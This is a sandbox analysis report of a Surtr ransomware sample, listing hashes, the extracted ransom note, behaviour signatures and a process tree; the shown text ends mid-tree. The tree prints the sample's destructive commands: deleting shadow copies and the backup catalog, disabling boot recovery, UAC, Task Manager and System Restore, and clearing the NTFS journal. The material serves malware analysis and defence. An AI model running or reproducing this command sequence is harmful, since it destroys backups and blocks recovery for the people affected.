Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2022 09:48

General

  • Target

    abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe

  • Size

    1.1MB

  • MD5

    ad539ebdf9e34e02be487134cf9a6713

  • SHA1

    b5af8a12c5a6ed369debaad7eab59e3cb1715e2d

  • SHA256

    abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14

  • SHA512

    386291d7dd9fa62f7514e784a238bd7a5099a0d2edd8af6085c61e3953a6914faf3dc299f07d56bed3b5b337a18c8b636c84f88693d3bc2512f8dfd51e711492

  • SSDEEP

    24576:g3BzKGHF0bxTCFvXwKt/aISpu4Qc6F3v1HT2BzN2tgGS3YzYhoHWxVGI8WIQbQ:KV4xTCwu4Qc6/F87gIwQ

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Family

surtr

Ransom Note
SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (g463r2utzh5cgl) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Detects Surtr Payload 1 IoCs
  • Surtr

    Ransomware family first seen in late 2021.

  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 51 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe
    "C:\Users\Admin\AppData\Local\Temp\abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:4572
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:2464
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @echo off
        2⤵
          PID:4144
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c chcp 437
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3196
          • C:\Windows\SysWOW64\chcp.com
            chcp 437
            3⤵
              PID:2408
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
            2⤵
              PID:1756
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3508
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                3⤵
                • Interacts with shadow copies
                PID:852
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:652
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                3⤵
                • Interacts with shadow copies
                PID:1112
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2356
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                3⤵
                • Modifies boot configuration data using bcdedit
                PID:2256
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2352
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                3⤵
                • Interacts with shadow copies
                PID:4196
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:5008
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                3⤵
                • Modifies boot configuration data using bcdedit
                PID:5056
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:5012
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                3⤵
                • Enumerates connected drives
                • Interacts with shadow copies
                PID:1456
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:5000
              • C:\Windows\system32\fsutil.exe
                fsutil.exe usn deletejournal /D C:
                3⤵
                • Deletes NTFS Change Journal
                PID:3876
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
              2⤵
                PID:1588
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                  3⤵
                  • Enumerates connected drives
                  • Interacts with shadow copies
                  PID:772
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                2⤵
                  PID:4684
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin.exe delete catalog -quiet
                    3⤵
                    • Deletes backup catalog
                    PID:3112
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                  2⤵
                    PID:2992
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                      3⤵
                      • Enumerates connected drives
                      • Interacts with shadow copies
                      PID:1300
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                    2⤵
                      PID:4128
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                        3⤵
                        • Interacts with shadow copies
                        PID:3696
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                      2⤵
                        PID:4720
                        • C:\Windows\system32\schtasks.exe
                          schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                          3⤵
                            PID:732
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                          2⤵
                            PID:380
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                              3⤵
                              • Enumerates connected drives
                              • Interacts with shadow copies
                              PID:1996
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                            2⤵
                              PID:2064
                              • C:\Windows\system32\reg.exe
                                reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                3⤵
                                • UAC bypass
                                PID:1520
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                              2⤵
                                PID:372
                                • C:\Windows\system32\reg.exe
                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                  3⤵
                                    PID:1292
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                  2⤵
                                    PID:4308
                                    • C:\Windows\system32\vssadmin.exe
                                      vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                      3⤵
                                      • Enumerates connected drives
                                      • Interacts with shadow copies
                                      PID:4240
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:4048
                                      • C:\Windows\system32\reg.exe
                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                        3⤵
                                          PID:3940
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                        2⤵
                                          PID:1348
                                          • C:\Windows\system32\vssadmin.exe
                                            vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                            3⤵
                                            • Enumerates connected drives
                                            • Interacts with shadow copies
                                            PID:1100
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                          2⤵
                                            PID:4064
                                            • C:\Windows\system32\vssadmin.exe
                                              vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                              3⤵
                                              • Enumerates connected drives
                                              • Interacts with shadow copies
                                              PID:2372
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                            2⤵
                                              PID:4880
                                              • C:\Windows\system32\reg.exe
                                                reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                3⤵
                                                  PID:2276
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:3328
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                    3⤵
                                                      PID:2228
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                    2⤵
                                                      PID:4560
                                                      • C:\Windows\system32\vssadmin.exe
                                                        vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                        3⤵
                                                        • Enumerates connected drives
                                                        • Interacts with shadow copies
                                                        PID:4576
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                      2⤵
                                                        PID:3900
                                                        • C:\Windows\system32\vssadmin.exe
                                                          vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                          3⤵
                                                          • Interacts with shadow copies
                                                          PID:4444
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:2364
                                                          • C:\Windows\system32\reg.exe
                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                            3⤵
                                                              PID:3360
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:828
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                3⤵
                                                                  PID:3752
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                2⤵
                                                                  PID:4496
                                                                  • C:\Windows\system32\vssadmin.exe
                                                                    vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                                    3⤵
                                                                    • Interacts with shadow copies
                                                                    PID:4716
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                  2⤵
                                                                    PID:4412
                                                                    • C:\Windows\system32\vssadmin.exe
                                                                      vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                      3⤵
                                                                      • Enumerates connected drives
                                                                      • Interacts with shadow copies
                                                                      PID:1620
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:3780
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                        3⤵
                                                                          PID:1636
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:516
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                              PID:624
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:4980
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                3⤵
                                                                                  PID:2236
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                                2⤵
                                                                                  PID:2932
                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                                    3⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:5140
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                  2⤵
                                                                                    PID:4624
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                      3⤵
                                                                                        PID:2072
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                                      2⤵
                                                                                        PID:2964
                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                          vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                                          3⤵
                                                                                          • Interacts with shadow copies
                                                                                          PID:2908
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                        2⤵
                                                                                          PID:3748
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                              PID:4520
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                            2⤵
                                                                                              PID:1016
                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                                3⤵
                                                                                                • Enumerates connected drives
                                                                                                • Interacts with shadow copies
                                                                                                PID:1688
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                              2⤵
                                                                                                PID:1584
                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                  vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                                  3⤵
                                                                                                  • Interacts with shadow copies
                                                                                                  PID:5156
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                2⤵
                                                                                                  PID:3924
                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                    vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                    3⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:5852
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                  2⤵
                                                                                                    PID:4152
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                      3⤵
                                                                                                        PID:5948
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                      2⤵
                                                                                                        PID:2384
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                          3⤵
                                                                                                            PID:5800
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                                          2⤵
                                                                                                            PID:2724
                                                                                                            • C:\Windows\system32\vssadmin.exe
                                                                                                              vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                                              3⤵
                                                                                                              • Enumerates connected drives
                                                                                                              • Interacts with shadow copies
                                                                                                              PID:5464
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                            2⤵
                                                                                                              PID:3568
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                3⤵
                                                                                                                  PID:5968
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                2⤵
                                                                                                                  PID:2076
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                    3⤵
                                                                                                                      PID:5288
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                    2⤵
                                                                                                                      PID:372
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                        3⤵
                                                                                                                          PID:6128
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                        2⤵
                                                                                                                          PID:4524
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                            3⤵
                                                                                                                              PID:5660
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                                            2⤵
                                                                                                                              PID:3300
                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                                                3⤵
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Interacts with shadow copies
                                                                                                                                PID:5996
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                              2⤵
                                                                                                                                PID:2972
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                                  3⤵
                                                                                                                                    PID:5884
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                  2⤵
                                                                                                                                    PID:732
                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                      vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded
                                                                                                                                      3⤵
                                                                                                                                      • Interacts with shadow copies
                                                                                                                                      PID:5564
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                    2⤵
                                                                                                                                      PID:2448
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:5900
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                          PID:288
                                                                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                                                                            vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                            3⤵
                                                                                                                                            • Enumerates connected drives
                                                                                                                                            • Interacts with shadow copies
                                                                                                                                            PID:5932
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                          2⤵
                                                                                                                                            PID:280
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:6020
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                              2⤵
                                                                                                                                                PID:2316
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6140
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3936
                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                      vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
                                                                                                                                                      3⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:5092
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2476
                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                        vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
                                                                                                                                                        3⤵
                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                        PID:4212
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
